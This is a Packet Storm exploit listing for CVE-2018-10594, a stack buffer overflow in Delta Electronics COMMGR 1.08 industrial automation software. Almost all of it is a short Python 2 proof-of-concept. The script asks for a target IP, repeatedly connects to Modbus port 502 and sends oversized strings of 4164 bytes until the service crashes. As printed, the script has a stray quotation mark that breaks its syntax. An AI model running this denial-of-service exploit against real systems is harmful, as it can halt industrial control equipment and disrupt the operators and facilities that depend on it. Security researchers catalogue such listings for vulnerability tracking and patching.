Lucene search

K
packetstormT4rkd3vilzPACKETSTORM:149741
HistoryOct 10, 2018 - 12:00 a.m.

Delta Electronics Delta Industrial Automation COMMGR 1.08 Buffer Overflow

2018-10-1000:00:00
t4rkd3vilz
packetstormsecurity.com
43

0.623 Medium

EPSS

Percentile

97.9%

`# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR  
- Remote STACK-BASED BUFFER OVERFLOW  
# Date: 02.07.2018  
# Exploit Author: t4rkd3vilz  
# Vendor Homepage: http://www.deltaww.com/  
# Software Link:  
http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US  
# Version:  
COMMGR Version 1.08 and prior.  
DVPSimulator EH2, EH3, ES2, SE, SS2  
AHSIM_5x0, AHSIM_5x1  
# Tested on: Kali Linux  
# CVE : CVE-2018-10594  
  
  
#Run exploit, result DOS  
  
import socket  
  
  
ip = raw_input("[+] IP to attack: ")  
  
sarr = []  
i = 0  
while True:  
try:  
sarr.append(socket.create_connection((ip,502)))  
print "[+] Connection %d" % i  
crash1 = "\x41"*4164"  
sarr[i].send(crash1+'\r\n')  
i+=1  
except socket.error:  
print "[*] Server crashed "  
raw_input()  
break  
`